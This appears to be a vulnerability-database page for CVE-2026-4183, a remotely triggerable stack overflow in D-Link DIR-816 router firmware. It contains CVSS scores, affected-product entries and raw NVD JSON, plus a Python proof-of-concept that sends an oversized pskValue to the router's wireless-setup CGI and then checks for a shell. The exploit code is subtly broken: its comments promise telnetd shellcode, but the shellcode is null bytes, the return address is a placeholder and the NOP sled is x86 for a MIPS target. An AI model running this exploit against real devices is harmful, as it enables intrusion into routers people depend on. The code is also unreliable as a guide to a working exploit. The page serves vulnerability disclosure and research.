Security Vulnerability Report
CVE-2026-4183 CVSS 9.8 CRITICAL

CVE-2026-4183

Published: 2026-03-16 14:19:59
Last Modified: 2026-03-19 19:56:48

Description

A security vulnerability has been detected in D-Link DIR-816 1.10CNB05. Affected is an unknown function of the file /goform/form2WlanBasicSetup.cgi of the component goahead. Such manipulation of the argument pskValue leads to stack-based buffer overflow. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-816_firmware:1.10cnb05:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-816:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-816 1.10CNB05

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-4183 PoC - D-Link DIR-816 Stack Buffer Overflow
Affected: D-Link DIR-816 1.10CNB05
Component: /goform/form2WlanBasicSetup.cgi
Parameter: pskValue
"""
import requests
import sys

TARGET = "http://{target_ip}/goform/form2WlanBasicSetup.cgi"


def create_exploit_payload():
    # Buffer size for overflow (adjust based on target)
    # Typical stack buffer size in embedded devices: 256-1024 bytes
    buffer_size = 1024

    # Create overflow payload with NOP sled + shellcode + return address
    # Padding to reach buffer boundary
    padding = b'A' * buffer_size

    # Return address (needs to be adjusted for target)
    # Common approach: point to NOP sled or shellcode
    return_addr = b'\x42\x42\x42\x42'  # Placeholder - need to find correct address

    # NOP sled for reliable exploitation
    nop_sled = b'\x90' * 100

    # Simple shellcode - executes telnetd for remote access
    # This is a placeholder, actual shellcode depends on target architecture (MIPS typically)
    shellcode = b'\x00' * 50

    payload = padding + return_addr + nop_sled + shellcode
    return payload


def exploit(target_ip):
    print(f"[*] Target: {target_ip}")
    print(f"[*] Exploiting CVE-2026-4183...")

    # Construct malicious request
    payload = create_exploit_payload()

    # POST data with overflow in pskValue parameter
    data = {
        'pws': 'admin',
        'pskValue': payload.decode('latin-1'),  # Send overflow payload
        'wlanMode': 'ap',
        'ssid': 'TestSSID',
        'channel': '6',
        'bandwidth': '20',
        'submit': 'Apply'
    }

    try:
        print(f"[*] Sending malicious request...")
        response = requests.post(
            TARGET.format(target_ip=target_ip),
            data=data,
            timeout=10
        )
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Exploit sent. Check if shell is available on target.")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return False

    return True


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)

    exploit(sys.argv[1])
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4183", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:59.250", "lastModified": "2026-03-19T19:56:48.130", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in D-Link DIR-816 1.10CNB05. Affected is an unknown function of the file /goform/form2WlanBasicSetup.cgi of the component goahead. Such manipulation of the argument pskValue leads to stack-based buffer overflow. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en D-Link DIR-816 1.10CNB05. Afectada es una función desconocida del archivo /goform/form2WlanBasicSetup.cgi del componente goahead. Tal manipulación del argumento pskValue conduce a desbordamiento de búfer basado en pila. El ataque puede ser ejecutado remotamente. El exploit ha sido divulgado públicamente y puede ser usado. 
Esta vulnerabilidad solo afecta productos que ya no son soportados por el mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", 
"confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-816_firmware:1.10cnb05:*:*:*:*:*:*:*", "matchCriteriaId": "6A221E99-E2B0-4C57-9263-9A86EFF8746E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-816:-:*:*:*:*:*:*:*", "matchCriteriaId": "B54058C1-B58F-434A-ABF0-A6B314A1AB14"}]}]}], "references": [{"url": "https://github.com/wudipjq/my_vuln/blob/main/D-Link7/vuln_87/87.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.351087", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.351087", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.769831", "source": "cna ... (truncated)